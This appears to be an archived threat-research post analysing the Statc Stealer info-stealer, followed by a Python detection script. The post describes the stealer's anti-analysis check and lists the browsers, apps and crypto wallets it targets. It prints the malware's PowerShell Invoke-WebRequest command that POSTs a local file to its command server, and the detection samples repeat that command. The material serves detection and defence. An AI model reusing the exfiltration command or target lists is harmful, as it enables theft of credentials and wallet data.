Statc Stealer | ThreatLabz
By Shivam Sharma, Amandeep Kumar
Published: 2023-08-08 · Archived: 2026-04-05 21:50:14 UTC
https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat

Technical Analysis

Evasion using anti-analysis techniques

Typically, info stealers like Statc Stealer employ sophisticated techniques to avoid detection and persist on the victim's machine. We found one anti-analysis technique while analyzing Statc Stealer:

- The sample looks for its original file name
- It checks whether its file name is the same as its internal name
- It stops executing if it finds differences

Essentially, if Statc Stealer discovers that you've changed or updated its malicious files, then it stops in its tracks. The code example in the image below shows how:

- The sample uses a FileName check
- The sample compares the file name with a hardcoded encrypted string

Figure 3: File name comparison code

Theft and exfiltration of data

Stealing activity

Statc Stealer has a general information stealing capability. It is able to take sensitive information from various browsers and wallets, and then store the data in a text file inside a Temp folder.

Using the Python script we mentioned above, we decrypted Statc Stealer's encrypted strings. The image below shows various references to "wallets" and "crypto", indicating that sensitive cryptocurrency information has been compromised.

Figure 4: Decrypted strings using Python script

Figure 5: Encrypted strings

Figure 6: Decrypted strings

Browser exfiltration

Browser exfiltration is the unauthorized transfer of any data from a browser.
It can involve social engineering, phishing attacks and emails, and even uploading data to an insecure hard drive. However, Statc Stealer uses its malicious software to drop and execute malicious files. Let's explore how this works.

How it works

Statc Stealer employs a straightforward and easily detectable technique to steal browser data. It launches PowerShell and uses the Invoke-WebRequest cmdlet to POST a local file to a Uniform Resource Identifier (URI), with the following arguments:

Invoke-WebRequest -Uri https[:]//topgearmemory[.]com/kdsfedafa/stat?c= -Method POST -InFile C:\Users\

The significance of Statc Stealer's exfiltration technique lies in its potential to steal sensitive browser data and send it securely to its C&C server. This allows the malware to harvest valuable information, such as login credentials and personal details, for malicious purposes like identity theft and financial fraud. Despite its simplicity, the technique aids security experts in detecting and analyzing the malware's behavior, enabling the development of effective countermeasures.

Targeted browsers

The Statc Stealer malware can exfiltrate data from the following browsers:

- Chrome
- Microsoft Edge
- Brave
- Opera
- Yandex
- Mozilla Firefox

It comes as no surprise that Statc Stealer, with its PE structure, strategically targets the most popular Windows browsers. By capitalizing on their widespread usage, this info stealer can cast a wider net, seeking to compromise sensitive data from a larger pool of unsuspecting users.

Stealing autofill data

Statc Stealer is also capable of exfiltrating autofill data.
If a stealer takes autofill data, login credentials, Personally Identifiable Information (PII) and payment information are at risk:

- Usernames and passwords
- Email
- Credit card details
- Personal addresses
- Payment information

Figure 7: Stolen data in decrypted form

Figure 8: Stolen data after encryption

In the images above, Statc Stealer is exfiltrating browsers' autofill information. From here, the malware encrypts the stolen data and stores it in a text file in the Temp folder.

Process Monitor (ProcMon)

Process Monitor (ProcMon) is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity. It can help provide a snapshot of the types of sensitive information Statc Stealer is capable of stealing.

Using ProcMon, we observed that Statc Stealer steals:

- user's cookies data
- web data
- local state data
- preferences
- login data
- information from various wallets
- FileZilla
- browser autofills
- AnyDesk
- ronin_edge
- MetaMask
- Telegram data

We captured this malicious activity in ProcMon in the image below.
Figure 9: Browser related data shown in ProcMon

Wallet data

The Statc Stealer can exfiltrate data from various wallets, like:

- Cryptocom-Wallet
- Petra-aptos-wallet
- exodus-web3-wallet
- bitkeep-crypto-nft-wallet
- liquality-wallet
- ethos-sui-wallet
- suite-sui-wallet
- tallsman-polkadot-wallet
- Enkrypt-ethereum-polkadot
- leap-cosmos-wallet
- pontem-aptos-wallet
- fewcha-move-wallet
- rise-aptos-wallet
- teleport-wallet
- martin-wallet-aptos-sui
- avana-wallet-solana-wallet
- glow-solana-wallet-beta
- solflare-wallet

Source: https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat
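The two behaviours described above (the PowerShell Invoke-WebRequest POST with -InFile, and a non-browser process reading Chromium profile files such as Login Data and Local State as seen in ProcMon) can be turned into simple detection rules. The following is an added example, not code from the ThreatLabz post; the process names in BROWSER_PROCESSES and all sample events are constructed assumptions to tune for your own estate.

```python
"""Detection logic for the Statc Stealer behaviours described in the post.
Added example, not ThreatLabz code; sample events below are constructed."""

# Chromium profile files the post says the stealer reads (compared case-insensitively).
SENSITIVE_FILES = {"login data", "web data", "cookies", "local state", "preferences"}
# Processes that legitimately open those files (assumption: Yandex ships as browser.exe).
BROWSER_PROCESSES = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe",
                     "browser.exe", "firefox.exe"}


def flag_exfil_cmdline(cmdline: str) -> bool:
    """True when a command line POSTs a local file with Invoke-WebRequest (or its alias iwr)."""
    tokens = cmdline.lower().split()
    uses_iwr = any(t in ("invoke-webrequest", "iwr") for t in tokens)
    posts = any(tokens[i] == "-method" and tokens[i + 1] == "post"
                for i in range(len(tokens) - 1))
    return uses_iwr and posts and "-infile" in tokens


def flag_procmon_row(process: str, operation: str, path: str) -> bool:
    """True when a non-browser process reads a sensitive Chromium profile file."""
    basename = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return (operation in ("CreateFile", "ReadFile")
            and basename in SENSITIVE_FILES
            and process.lower() not in BROWSER_PROCESSES)


# Constructed sample telemetry: (process, command line) and ProcMon-style (process, op, path).
PROC_EVENTS = [
    ("powershell.exe", "Invoke-WebRequest -Uri https[:]//topgearmemory[.]com/kdsfedafa/stat?c= "
                       "-Method POST -InFile C:\\Users\\victim\\AppData\\Local\\Temp\\out.txt"),
    ("powershell.exe", "Invoke-WebRequest -Uri https://updates.example.test/pkg.msi "
                       "-OutFile C:\\Temp\\pkg.msi"),
]
PROCMON_ROWS = [
    ("stealer.exe", "ReadFile", r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    ("chrome.exe", "ReadFile", r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    ("stealer.exe", "ReadFile", r"C:\Users\victim\AppData\Roaming\FileZilla\recentservers.xml"),
]


def run_detections():
    """Return (suspicious command lines, suspicious ProcMon rows) over the samples."""
    cmd_hits = [cmd for _, cmd in PROC_EVENTS if flag_exfil_cmdline(cmd)]
    row_hits = [row for row in PROCMON_ROWS if flag_procmon_row(*row)]
    return cmd_hits, row_hits


if __name__ == "__main__":
    for hit in run_detections():
        print(hit)
```

The FileZilla row is deliberately not flagged: the post lists FileZilla as a target, but this rule covers only the Chromium profile files, so extend SENSITIVE_FILES for other artifacts you care about.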